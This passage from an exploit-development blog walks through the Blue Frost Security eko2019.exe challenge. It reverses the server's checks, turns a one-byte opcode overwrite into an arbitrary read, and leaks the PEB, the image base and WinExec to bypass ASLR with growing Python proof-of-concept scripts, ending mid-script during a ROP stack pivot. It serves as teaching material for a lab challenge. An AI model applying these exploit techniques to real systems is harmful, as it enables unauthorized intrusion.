Here are a list of some of the possible control bits. These bits are the ones we care about, and it is not an exhaustive list.

  1. P - The PTE is valid if this bit is set
  2. R/W - Writing is enabled if this bit is set
  3. U/S - If this bit is set, the page is a user mode page. If this bit is clear, the page is a supervisor (kernel) mode page
  4. D - If this bit is set, a write has been made to this page, making it a “dirty” page
  5. A - If this bit is set, this memory page has been referenced at some point

Mouth Of The River

Again, this was by no means meant to be an exhaustive and comprehensive “tell all” of memory paging. This article barely scratched the surface. However, understanding things like control bits and virtual memory and having that as prerequisite knowledge allows you to understand bypassing mitigations such as NX in kernel pool memory, or more ways of bypassing SMEP. The next post will go into bypassing SMEP and NX in the kernel by way of the prerequisite knowledge laid out here.

You know the drill, any comments, questions, corrections, feel free to reach out to me. Until then!

Peace, love, and positivity! :-)

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00

Introduction

I recently have been spending the last few days working on obtaining some more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge put on by Blue Frost Security earlier in the year- which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to try to become more well versed with the entire development lifecycle, starting with identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application. In addition, I’ll be using WinDbg to develop the exploit. I prefer to use IDA to view the execution of a program- but I prefer to use the Ghidra decompiler to view the code that the program is comprised of. In addition to the aforementioned information, this exploit will be developed on Windows 10 x64 RS2, due to the fact the I already had a VM with this OS ready to go. This exploit will work up to Windows 10 x64 RS6 (1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by DATA XREF: sub_1400011E0+11E↑o comment, which is a cross reference of data in this case, in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides, is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for awhile, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, The local_258 variable is initialized with the recv() function. Using this function, eko2019.exe will “read in” the data sent from the client. The recv() function makes the function call with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length which local_28 should be (0x10 hexadecimal bytes/16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means, is that the size of the request received by the recv() function will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set, makes a call to printf() which displays a message indicating the “header” has been received, and prints the value of local_258.

printf(s__[+]_Header_received:_%i_bytes_14000c008,(ulonglong)local_258)

We can interpret this behavior as that eko2019.exe seems to accept a header before the “message” portion of the client request is received. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first “check” the application makes on our request, thus being the first “check” we must bypass.

Number two, after the header is received by the program, the specific variable that contains the pointer to the buffer received by the previous recv() request (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of the local_28, declared at the beginning of this function, we notice it is a longlong. This means that the variable should 8 bytes in totality. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This behavior is indicatory that the string of Eko2019 should be null terminated. The null character will provide the last byte needed for our purposes.

This is how this check is executed, in IDA.

Number three, is the variable local_20’s size is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data recieved in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The size of local_258, which at this point is the size of our message (not the header), is shifted to the right, via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size was 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement local_258 + uVar2 == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same forumla above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199 and using bitwise AND on the result- yields a nonzero value (1).

This means the if statement would have failed, and our message would not go have gone through (since 0x199 is not a multiple of 8)!

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUNC_140001170
hProcess = GetCurrentProcess();
WriteProcessMemory(hProcess,FUN_140001000,local_250,8,&local_260);

The Windows API function GetCurrentProcess() first creates a handle to the current process (eko2019.exe). This handle is passed to a call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as such.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);
  • hProcess in this case is will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned as a value of 8, this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have better idea of what will be written where, let’s see how this all looks in IDA.

There are something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you can recall from the WriteProcessMemory() arguments, the buffer in which WriteProcessMemory() will write from, is actually from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, it seems as though the unkown data type, unk_14000E520, is placed into the RCX register. The value pointed to by this location (the actual data inside the unknown data type), with the value of RAX tacked on, is then placed fully into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

We can recall from the WriteProcessMemory() function arguments earlier, that the location to which sub_140001170 will be written to, is sub_140001000 (eko2019.exe+0x1000). What is most interesting, is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written to where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction and dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)
s.recv(1024)
s.close()

Before sending this proof of concept, let’s make sure a breakpoint is set at ek2010.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following is the decompiled code from Ghidra that corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 bytes are that of a “return” instruction. What is of even more interest, is the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the value of RAX + RCX!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time a function executes- the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based off of the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look into RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language for example, specifying the first function argument as ffffffffffffffff would represent the current process- without even needing to obtain a handle to the current process! This is because technically GetCurrentProccess() returns a “pseudo handle” to the current process. A pseudo handle is a special constant of (HANDLE)-1, or ffffffffffffffff.

All that is left now, is to step through up until the call to WriteProcessMemory() to verify everything will write as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

The fifth argument is located at RSP + 0x20. This is what the __fastcall calling convention defaults to after four arguments. Each argument after 5th will start at the location of RSP + 0x20. Each subsequent argument will be placed 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which is located in the R8 register, to the location of sub_140001000 (eko2019.exr+0x1000).

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the program is now done accepting and returning network data to clients, it would be logical that perhaps the value in RAX may be returned to the client over a network connection, since the function is done executing! After all, this is a client/server architecture. Let’s test this theory, by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection
s.close()

What this updated code will do is read in 1024 bytes from the server response. Then, the struct.unpack_from() function will interpret the data received back in the response from the server in the form of an unsigned long long (8 byte integer basically). This data is then indexed at its “first” position and formatted into hex and printed!

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [ecx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script- that value should be printed to the screen in our script! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value of the function call to sub_140001000 (eko2019.exe+0x1000) remotely (aka RAX)! This means that we can obtain some type of information leakage (although, it is not particuraly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers- we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes- let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being in a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach eko2019.exe to WinDbg and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170)

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primtive due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where are the bytes in our message buffer stored into RCX
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list firstly.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode, that when combined with the opcodes \x48\x8b\x01 (which makes up the move instruction in eko2019.exe we are talking about) does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, lets start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB for a process is the user mode representation of a process, similarly to how _EPROCESS is the kernel mode representation of kernel mode objects.

Why is this relevant this you ask? Since we have the ability to extract the pointer from a location in memory, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from this previous of two posts about kernel shellcode, that a segment register is just a register that is used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very prudent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! Firstly, however, we need to identify where this byte is within our proof of concept.

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

As you can see from the image below, when we hit the move operation and we have got the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will always change after the application (process) is restarted.

What is most devastating about identifying the PEB of eko2019.exe, is that the base address for the current process (eko2019.exe in this case) is located at an offset of PEB+0x10

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract that value into RAX (what PEB+0x10 points to). The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you can recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr[rcx] instruction. To ensure this is the instruction executed this time, we will use our byte we control to implement a NOP- to slide into the intended instruction.

As mentioned earlier, we will close our first connection to the client, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means now, that when we need to execute our code in the future- we can dynamically resolve our ROP gadgets via offsets- and ASLR will no longer be a problem! The only question remains- how are we going to execute any code?

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense to us. This is much easier than going through with a full VirtualProtect() function call, to make our code executable- since all we will need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the pointer in RCX (which we will fill with eko2019.exe+0x9010). Let’s update our proof of concept with a fourth request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

Landing on the move instruction, we can see that the address of WinExec() is about to be extracted from RCX!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. If you can recall from earlier, when we first increased our number of bytes from 512 to 528 and the \x41 byte was accessed BEFORE the mov rax, qword ptr [rcx] instruction was executed (which resulted in an access violation and a subsequent crash), the disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction set- because that opcode doesn’t create a valid set of opcodes with said move instruction.

Investigating a little bit more, we can recall that our move instruction also ends with a ret, which will take the value located at RSP (the stack), and execute it. Since we can control RCX- if we could find a way to load RCX into RSP, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX onto the stack (which is a stack pivot ROP gadget). Pushing an item on the stack, will actually load said item into RSP! This means that we can load our own ROP gadget into RSP, and then execute the ret instruction to leave the function- which will execute our ROP gadget! The first step for us, is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the stack up in value, to load our user controlled values into RSP and subsequent bytes after RSP! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
